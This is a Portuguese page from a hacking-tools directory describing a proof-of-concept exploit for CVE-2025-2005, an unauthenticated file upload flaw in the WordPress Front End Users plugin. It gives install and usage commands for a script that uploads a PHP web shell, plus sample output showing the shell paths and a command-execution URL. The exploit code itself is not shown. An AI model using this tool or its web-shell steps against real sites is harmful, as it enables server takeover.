Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2005 — WordPress FEUP Exploit de Upload Arbitrário de Arquivos (CVE-2025-2005) | Kitploit
Ferramentas/GitHubGitHub/mrmtwoj/cve-2025-2005
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

WordPress FEUP Exploit de Upload Arbitrário de Arquivos (CVE-2025-2005)

Ver Repositório
31há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Exploit de Upload Arbitrário de Arquivos no WordPress FEUP (CVE-2025-2005)

Este repositório fornece um exploit de Prova de Conceito (PoC) para o plugin WordPress Front End Users (versões até 3.2.32), que é vulnerável a upload arbitrário de arquivos devido à falta de validação de MIME/tipo de arquivo no seu formulário de registro. Isso permite que atacantes não autenticados enviem arquivos maliciosos (ex.: web shells), potencialmente levando à Execução Remota de Código (RCE) no servidor.

Recursos

  • CVE-2025-2005: vulnerabilidade de upload de arquivos no plugin WordPress Front End Users
  • Interface simples de linha de comando
  • Descoberta automática de formulários de registro
  • Uploader de shell com nome de usuário/senha personalizados

Como Funciona

  • Envia uma requisição de registro ao formulário de registro FEUP vulnerável.
  • Envia um shell PHP por meio do campo de entrada de arquivo, contornando as restrições de tipo de arquivo.
  • Exibe o status do upload e informa se o site está vulnerável.

Alvos de Teste

  • Procura por formulários de registro contendo:
  • ewd-feup-register-form
  • Em URLs como:
root@kitploit:~
/register/
/signup/
  • ou qualquer link encontrado na página inicial

Começando

  • Python 3.x
  • módulos requests e beautifulsoup4:
root@kitploit:~
pip install requests beautifulsoup4

Instalação

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

Uso

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

Exemplo de Saída

root@kitploit:~
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!

Executar Exploit

root@kitploit:~
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
Baixar ferramenta